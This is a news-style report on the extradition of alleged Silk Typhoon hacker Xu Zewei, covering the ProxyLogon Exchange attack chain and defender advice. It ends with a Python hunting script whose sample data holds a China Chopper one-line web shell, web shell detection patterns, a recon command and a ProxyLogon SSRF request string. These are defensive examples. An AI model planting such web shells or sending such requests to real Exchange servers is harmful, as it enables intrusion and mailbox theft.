A Chinese national alleged to be a contract hacker for China's Ministry of State Security has been extradited from Italy to the United States to face cyberespionage charges. Xu Zewei, tied by U.S. prosecutors to the Silk Typhoon (Hafnium) intrusion set, is accused of conducting state-directed breaches between February 2020 and June 2021, including the mass exploitation of Microsoft Exchange Server zero-days that compromised thousands of organizations worldwide.
What Happened
The U.S. Department of Justice announced the extradition of Xu Zewei from Italy following his 2025 arrest in Milan at the request of American authorities. According to court documents, Xu operated as a contract hacker on behalf of the Shanghai State Security Bureau (SSSB), a regional arm of the PRC's Ministry of State Security (MSS), while employed by Shanghai Powerock Network Co., Ltd. The DOJ describes Powerock as one of multiple front companies that Beijing uses to conduct offensive cyber operations at arm's length from the formal state intelligence apparatus.
Xu is alleged to have participated in a sustained campaign of intrusions over a roughly 16-month period, working alongside co-conspirators directed by MSS officers. He now faces multiple federal counts related to computer intrusions and conspiracy, with an initial appearance in U.S. federal court forthcoming.
What Was Taken
Prosecutors allege the Silk Typhoon campaign tied to Xu targeted high-value research and communications data:
- COVID-19 research data: vaccine, treatment, and diagnostic testing information stolen from medical research organizations during the height of the pandemic response.
- Email mailbox contents: full mailbox access obtained from compromised Microsoft Exchange Servers, exposing sensitive internal communications.
- Post-exploitation access beyond email: the indictment describes reconnaissance and lateral movement inside victim networks, indicating broader access than the mailboxes alone and potential exfiltration of additional intellectual property and strategic intelligence.
The Exchange exploitation campaign that began in late 2020 affected thousands of organizations globally before patches were broadly deployed, so the realistic scope of compromised organizations and stolen data is far larger than the set of victims named in the indictment.
Why It Matters
This extradition is one of the few times a named MSS contract operator has been transferred to U.S. custody to stand trial, and it matters for several reasons. It reinforces the now well-documented Chinese intelligence model of laundering state-directed intrusions through nominally private "network technology" companies, providing operational deniability while sustaining a deep bench of capable hackers. It also signals that allied jurisdictions, including Italy, are increasingly willing to act on U.S. extradition requests against alleged Chinese state cyber operatives, raising the personal risk for contractors who travel outside the PRC.
For defenders, the case is a reminder that Silk Typhoon/Hafnium activity is not merely an artifact of the 2021 Exchange crisis. The same operators, tooling, and tradecraft remain active, and the strategic targeting priorities (biomedical research, government communications, and managed service providers) are unchanged.
The Attack Technique
According to the indictment, Xu's alleged tradecraft aligns with publicly documented Silk Typhoon and Hafnium tooling:
- Initial access via internet-facing vulnerabilities: exploitation of unpatched, externally exposed systems, including the ProxyLogon family of Microsoft Exchange Server zero-days disclosed in early 2021 (CVE-2021-26855, an unauthenticated server-side request forgery, chained with CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 to write files and execute code on the server).
- Web shell deployment: post-exploitation placement of web shells on compromised Exchange servers to maintain persistence and provide an interactive foothold.
- Mailbox access and data theft: direct extraction of mailbox contents using the web shell foothold.
- Lateral movement and reconnaissance: pivoting from the Exchange beachhead deeper into victim networks to identify and exfiltrate additional data of intelligence value.
- Tasking via MSS handlers: targets and intelligence requirements allegedly assigned by Shanghai State Security Bureau officers, with Powerock acting as the contracting wrapper.
What Organizations Should Do
- Hunt for legacy Hafnium/Silk Typhoon web shells: even patched Exchange environments may retain undiscovered web shells from the 2020 to 2021 mass exploitation window. Audit on-prem Exchange for unauthorized .aspx files, anomalous child processes of the IIS worker process (w3wp.exe), and unexpected scheduled tasks.
- Retire or hard-isolate on-prem Exchange where feasible: prioritize migration to hosted email or, at minimum, place remaining on-prem Exchange behind authenticated reverse proxies and restrict OWA/ECP exposure to the public internet.
- Patch and monitor edge appliances aggressively: Silk Typhoon's broader playbook routinely targets internet-facing devices beyond Exchange, including VPNs, file transfer appliances, and remote management tools. Treat n-day patching of perimeter systems as a 24- to 72-hour SLA.
- Apply targeted detections for Silk Typhoon TTPs: deploy detections for ProxyLogon-style exploitation chains, suspicious w3wp.exe child processes, China Chopper and similar web shells, and credential dumping via LSASS access from web-tier hosts.
- Tighten egress controls and DNS visibility: web shell operators rely on outbound HTTPS to attacker infrastructure. Egress filtering, TLS inspection where lawful, and DNS logging materially raise the cost of post-exploitation activity.
- Treat biomedical, government-adjacent, and MSP environments as priority targets: organizations in these verticals should assume active interest from Chinese state-aligned actors and align threat models, red team scenarios, and tabletop exercises accordingly.
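The hunting and detection items above (web shell triage, w3wp.exe child processes, ProxyLogon exploitation traces) map directly onto the attack chain described under The Attack Technique. The following Python is an added example, not code from the article or from any vendor guidance: it runs three heuristics over constructed sample data (Sysmon-style process events, a handful of .aspx file contents, and a simplified Exchange HttpProxy log in CSV form). The ServerInfo~ AnchorMailbox check and the aspnet_client check follow Microsoft's public 2021 ProxyLogon hunting guidance; the column set of the HttpProxy sample, the file paths, and all event contents are assumptions made for the example.

```python
"""Hunt heuristics for Hafnium / Silk Typhoon style Exchange post-exploitation.

All sample data below is constructed for illustration; it is not from any real incident.
The three checks correspond to the indicators published during the 2021 ProxyLogon response:
  1. w3wp.exe (the IIS worker process) spawning a shell or recon tool  -> web shell in use
  2. .aspx files carrying one-line web shell code, or sitting under aspnet_client -> dropped shell
  3. Exchange HttpProxy log rows with no authenticated user and a ServerInfo~ AnchorMailbox
     -> CVE-2021-26855 SSRF request routed to a backend endpoint
"""
import csv
import io
import re
from dataclasses import dataclass

IIS_WORKER = "w3wp.exe"
# Children w3wp.exe has no business spawning; csc.exe (ASP.NET page compilation) is expected.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "net.exe", "net1.exe",
                       "whoami.exe", "rundll32.exe", "procdump.exe", "certutil.exe"}
ASPNET_CLIENT = "\\aspnet_client\\"  # holds only static client files in a default install

WEBSHELL_PATTERNS = [
    # China Chopper JScript one-liner: eval(Request.Item["pw"], "unsafe")
    re.compile(r"eval\s*\(\s*Request\.", re.I),
    # File-dropper style: write attacker-controlled content to an attacker-controlled path
    re.compile(r"File\.WriteAllText\s*\(\s*Request\[", re.I),
]


@dataclass
class Finding:
    rule: str
    detail: str


def _basename(win_path: str) -> str:
    return win_path.rsplit("\\", 1)[-1].lower()


def hunt_process_events(events):
    """Sysmon-style process creation records: flag shells parented by the IIS worker."""
    return [Finding("w3wp_child_process", f"{_basename(ev['Image'])}: {ev['CommandLine']}")
            for ev in events
            if _basename(ev["ParentImage"]) == IIS_WORKER
            and _basename(ev["Image"]) in SUSPICIOUS_CHILDREN]


def triage_aspx(files):
    """{path: content} for .aspx files: flag shell code, or any .aspx under aspnet_client."""
    findings = []
    for path, content in files.items():
        if any(p.search(content) for p in WEBSHELL_PATTERNS):
            findings.append(Finding("webshell_content", path))
        elif path.lower().endswith(".aspx") and ASPNET_CLIENT in path.lower():
            findings.append(Finding("aspx_in_aspnet_client", path))
    return findings


def hunt_httpproxy_logs(csv_text):
    """Simplified HttpProxy CSV: an unauthenticated request whose AnchorMailbox carries a
    ServerInfo~host/path value is the attacker steering the SSRF to a backend endpoint."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        anchor = row["AnchorMailbox"]
        if not row["AuthenticatedUser"].strip() and anchor.startswith("ServerInfo~") and "/" in anchor:
            findings.append(Finding("proxylogon_ssrf", f"{row['DateTime']} {row['UrlStem']} {anchor}"))
    return findings


# --- constructed sample data (assumed paths, users and timestamps) ---
SAMPLE_PROCESS_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c "whoami /all"'},                     # recon via web shell
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": "csc.exe /noconfig /t:library"},                 # normal ASP.NET compile
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},                                      # interactive admin shell
]
SAMPLE_ASPX_FILES = {
    r"C:\inetpub\wwwroot\aspnet_client\system_web\help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
    r"C:\inetpub\wwwroot\aspnet_client\discover.aspx":
        '<%@ Page Language="C#" %><html><body>ok</body></html>',
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page Language="C#" %><% string url = Request.QueryString["url"]; %>',
}
SAMPLE_HTTPPROXY_LOG = "\n".join([
    "DateTime,AuthenticatedUser,UrlStem,AnchorMailbox",
    "2021-03-02T04:11:09.123Z,,/owa/auth/Current/themes/resources/logon.css,"  # one row
    "ServerInfo~localhost/ecp/DDI/DDIService.svc/GetObject?#~1941962753",
    "2021-03-02T04:12:00.000Z,contoso\\jdoe,/owa/,",                           # normal user
    "2021-03-02T04:12:30.000Z,,/owa/auth/logon.aspx,",                         # normal logon page
])


def run_all():
    """Run every check over the constructed samples and return the combined findings."""
    return (hunt_process_events(SAMPLE_PROCESS_EVENTS)
            + triage_aspx(SAMPLE_ASPX_FILES)
            + hunt_httpproxy_logs(SAMPLE_HTTPPROXY_LOG))


if __name__ == "__main__":
    for f in run_all():
        print(f"[{f.rule}] {f.detail}")
```

In a real hunt the three inputs come from the EDR process telemetry, a recursive listing of the Exchange web roots, and the CSV logs under the Exchange HttpProxy logging directory; the csc.exe case is included so that the process check does not fire on the routine ASP.NET compilation that w3wp.exe legitimately performs.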
Sources: Alleged Silk Typhoon hacker extradited to US for cyberespionage